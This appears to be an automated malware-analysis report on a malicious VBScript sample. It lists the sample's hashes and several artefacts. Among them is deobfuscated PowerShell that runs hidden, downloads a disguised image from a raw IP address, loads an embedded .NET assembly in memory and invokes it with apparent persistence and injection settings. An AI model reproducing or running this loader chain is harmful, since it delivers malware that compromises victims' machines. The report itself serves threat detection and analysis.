Malicious

VBScript | MD5: b5e360bf48a072a8fd3d9d80ffcb4151 | Size: 59.99 KB | MIME type: text/vbscript

Characteristics

Hashes:
MD5: b5e360bf48a072a8fd3d9d80ffcb4151
SHA-1: 58c64c7b6c9bf265ecb03303ff79c845637ab690
SHA-256: b3e1a441845d5db54c8b20222f61259157d96a5c681ca893640d737b546e5420
SHA-384: cad6744317337aad762e842fd8530055580441d41ff3c7cda484751f17426e14b47e727b2c022486a570ae14bae8d1b0
SHA-512: e0d1354d5770695b0319d93c60d19683612c46f3e260d0f0699d3967365b3d9e3ebf89bd39ced0c98e5536c51bc700e873bd6e3b6f519f2120b227647a648a23
ssdeep: 1536:fuHuU5+t4M/E8u6z8McVoqkAeuh5C6Vim1hiIacJmX1Bh5higvIKsXu54guD8CIA:zo8u6z8McVoqkAeuh5C6Vim1hiIacJmG
TLSH: 0643410AD353255BC4C3AF839FD611FCF4B0D99B60EEDC603A7A479529E386082745E6

File Structure: b5e360bf48a072a8fd3d9d80ffcb4151 (59.99 KB)

No malware configuration was found at this point.

Artefacts (Name / Value / Location)

URLs in VB Code - #1
Value: http://www.ostrosoft.com/smtp.html
Location: b5e360bf48a072a8fd3d9d80ffcb4151

Deobfuscated PowerShell (Malicious)
Value: powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression"
Location: b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell (Malicious)
Value: Invoke-Expression
Location: b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [PowerShell Command]

Deobfuscated PowerShell (Malicious)
Value: $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9yRs5WaWlzcP9CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Location: b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Base64-Block]

Deobfuscated PowerShell (Malicious)
Value: Invoke-Expression
Location: b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]

Deobfuscated PowerShell (Malicious)
Value: $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9yRs5WaWlzcP9CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Location: b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]

Deobfuscated PowerShell (Malicious)
Value: powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression"
Location: b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]

Deobfuscated PowerShell (Malicious)
Value: Invoke-Expression
Location: b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]
